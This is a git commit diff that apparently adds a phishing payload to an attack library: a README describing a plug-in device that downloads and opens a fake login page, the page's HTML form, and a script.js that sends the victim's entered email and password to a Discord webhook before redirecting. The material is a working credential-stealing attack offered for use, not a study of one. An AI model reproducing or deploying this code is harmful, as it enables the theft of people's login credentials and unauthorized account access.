Phishing material

2023-03-31 18:38:34 +02:00 · 2023-03-31 18:38:34 +02:00 · d7e86f3e4e
parent 2c66bd7f76
commit d7e86f3e4e
3 changed files with 91 additions and 0 deletions
--- a/payloads/library/phishing/StandardPhishingAttack_Linux/README.md
+++ b/payloads/library/phishing/StandardPhishingAttack_Linux/README.md
@ -0,0 +1,25 @@
+# Facebook Phishing Attack - Linux ✅
+
+A script used to exfiltrate the Facebook username and password by a phishing attack.
+
+**Category**: Phishing
+
+## Description
+
+A script used to exfiltrate the Facebook username and password by a phishing attack.
+
+Opens a shell, create a tmp directory that will be deleted in 3600 seconds, move into the directory, download your own zip, unzip it, open the login page and close the shell.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set the Discord wehbook (or whatever you want) into the login.js file at line 3
--- a/payloads/library/phishing/StandardPhishingAttack_Linux/login.html
+++ b/payloads/library/phishing/StandardPhishingAttack_Linux/login.html
@ -0,0 +1,34 @@
+<!DOCTYPE html>
+<html>
+<head>
+	<title>Form di Login con Bootstrap</title>
+	<meta charset="utf-8">
+	<meta name="viewport" content="width=device-width, initial-scale=1">
+	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
+	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
+	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
+	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
+</head>
+<body>
+	<div class="container">
+		<h2>Special and super secure login</h2>
+		<form onsubmit="send_login(); return false;" method="post">
+			<div class="form-group">
+				<label for="email">Email:</label>
+				<input type="email" class="form-control" id="email" placeholder="Insert your email">
+			</div>
+			<div class="form-group">
+				<label for="password">Password:</label>
+				<input type="password" class="form-control" id="password" placeholder="Insert your password">
+			</div>
+			<div class="form-check">
+				<label class="form-check-label">
+					<input type="checkbox" class="form-check-input"> Remember me
+				</label>
+			</div>
+			<button type="submit" class="btn btn-primary">Login</button>
+		</form>
+	</div>
+</body>
+<script src="script.js"></script>
+</html>
--- a/payloads/library/phishing/StandardPhishingAttack_Linux/script.js
+++ b/payloads/library/phishing/StandardPhishingAttack_Linux/script.js
@ -0,0 +1,32 @@
+async function send_login() {
+    // SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
+    const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
+
+    // Retrieve data from POST form
+    const email = document.getElementById('email').value;
+    const password = document.getElementById('password').value;
+
+    // Create message content
+    const message = "Email: " + email + " \n " + "Password: " + password;
+
+    try {
+        // Send POST request to Discord webhook URL
+        const response = await fetch(discord_webhook_url, {
+            method: "POST",
+            headers: {
+                "Content-Type": "application/json"
+            },
+            body: JSON.stringify({ content: message })
+        });
+        if (response.ok) {
+            window.location.href = "https://www.example.com";
+        } else {
+            // Otherwise, throw a generic error
+            throw new Error('Generic error!');
+        }
+    } catch (error) {
+        // Log any errors to the console
+        console.error(error);
+    }
+
+}